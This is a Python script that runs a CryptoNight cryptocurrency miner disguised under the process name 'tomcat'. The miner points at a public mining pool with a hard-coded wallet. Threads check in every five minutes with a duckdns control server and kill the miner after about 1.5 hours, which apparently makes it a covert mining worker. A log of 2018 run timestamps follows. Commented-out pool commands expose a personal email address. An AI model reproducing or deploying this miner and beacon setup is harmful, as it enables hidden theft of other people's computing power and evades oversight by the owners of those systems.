import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:03.719863
#2018-02-17 17:21:07.278443
#2018-02-17 19:09:01.288219
#2018-02-17 20:57:06.363690
#2018-02-17 22:43:01.890170
#2018-02-18 00:27:07.576961
#2018-02-18 02:18:04.252965
#2018-02-18 04:05:08.411121
#2018-02-18 05:56:01.539577
#2018-02-18 07:46:03.964200
#2018-02-18 09:34:01.850551
#2018-02-18 11:20:01.979574
#2018-02-18 13:06:01.906257
#2018-02-18 14:54:06.347890
#2018-02-18 16:43:01.430515
#2018-02-18 18:31:03.839385
#2018-02-18 20:19:03.550342
#2018-02-18 22:04:07.439430
#2018-02-18 23:53:04.140718
#2018-02-19 01:39:07.093352
#2018-02-19 03:27:04.195690
#2018-02-19 05:12:04.011387
#2018-02-19 06:58:03.421807
#2018-02-19 08:45:10.564742
#2018-02-19 10:33:07.234993
#2018-02-19 12:21:01.404854
#2018-02-19 14:07:08.679635
#2018-02-19 15:56:08.144967
#2018-02-19 17:44:06.688793
#2018-02-19 19:33:03.304878
#2018-02-19 21:20:07.084286
#2018-02-19 23:05:04.497723
#2018-02-20 00:48:05.653211
#2018-02-20 02:39:06.886317
#2018-02-20 04:27:07.098598
#2018-02-20 06:11:04.542837
#2018-02-20 07:56:02.015605
#2018-02-20 09:41:06.844357
#2018-02-20 11:25:06.697917
#2018-02-20 13:13:01.992812
#2018-02-20 14:59:03.629100
#2018-02-20 16:44:07.097838
#2018-02-20 18:32:11.053229
#2018-02-20 20:22:07.036628
#2018-02-20 22:08:07.991185
#2018-02-20 23:50:07.306325
#2018-02-21 01:35:04.428114
#2018-02-21 03:22:06.799839
#2018-02-21 05:11:05.280739
#2018-02-21 06:59:03.902810
#2018-02-21 08:45:06.916007
#2018-02-21 10:29:11.589900
#2018-02-21 12:17:08.628514
#2018-02-21 14:05:01.636211
#2018-02-21 15:49:07.285704
#2018-02-21 17:40:10.142253
#2018-02-21 19:27:06.120831
#2018-02-21 21:16:01.878739
#2018-02-21 23:02:01.248811
#2018-02-22 00:49:05.280234
#2018-02-22 02:37:07.984928
#2018-02-22 04:23:06.153448
#2018-02-22 06:10:06.906658
#2018-02-22 07:56:07.680710
#2018-02-22 09:45:11.100130
#2018-02-22 11:29:09.022171
#2018-02-22 13:17:07.921044
#2018-02-22 15:07:01.874373
#2018-02-22 16:50:08.042612
#2018-02-22 18:40:03.981223
#2018-02-22 20:31:06.214607
#2018-02-22 22:17:02.099149
#2018-02-23 00:03:01.666459
#2018-02-23 01:50:07.717061
#2018-02-23 03:38:06.331101
#2018-02-23 05:23:01.550375
#2018-02-23 07:09:01.491148
#2018-02-23 08:58:04.229480
#2018-02-23 11:14:01.795312
#2018-02-23 13:07:01.863771
#2018-02-23 14:52:04.503548
#2018-02-23 16:41:01.638355
#2018-02-23 18:27:05.105261
#2018-02-23 20:13:02.042494
#2018-02-23 22:02:08.892370
#2018-02-23 23:52:04.472937
#2018-02-24 01:42:06.982766
#2018-02-24 03:33:05.616574
#2018-02-24 05:18:06.491715
#2018-02-24 07:06:06.602874
#2018-02-24 08:54:05.557523
#2018-02-24 10:55:05.872041
#2018-02-24 12:43:03.357357
#2018-02-24 14:32:01.524120
#2018-02-24 16:19:01.512380
#2018-02-24 18:13:01.305584
#2018-02-24 19:59:04.215797
#2018-02-24 21:43:05.353477
#2018-02-25 00:38:01.959983
#2018-02-25 04:04:03.325264
#2018-02-25 07:35:08.316348